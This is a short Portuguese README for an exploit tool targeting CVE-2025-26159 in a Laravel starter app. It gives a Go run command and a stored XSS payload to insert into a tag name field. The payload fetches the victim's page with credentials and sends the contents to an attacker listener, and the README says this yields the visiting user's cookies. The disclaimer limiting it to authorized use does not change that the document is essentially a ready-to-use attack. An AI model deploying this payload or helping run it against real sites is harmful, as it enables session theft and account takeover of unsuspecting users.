
Este script decodifica, filtra e extrai cookies como parte da exploração da CVE-2025-26159.
Este script pode ser usado apenas em ambientes autorizados onde a permissão explícita foi concedida. O autor não se responsabiliza por qualquer uso indevido, dano ou consequências resultantes do uso deste script.
Este script decodifica, filtra e extrai cookies como parte da exploração da CVE-2025-26159.
Para entender os passos de exploração, confira este post no meu blog.
go run CVE-2025-26159.go
No campo de nome de tag do laravel starter, adicione este payload:
<script>fetch("/",{credentials:"include"}).then(r=>r.text()).then(d=>location='//127.1:9000/d='+escape(d))</script>
Após um usuário visitar a página de detalhes da tag maliciosa, você receberá os cookies dele.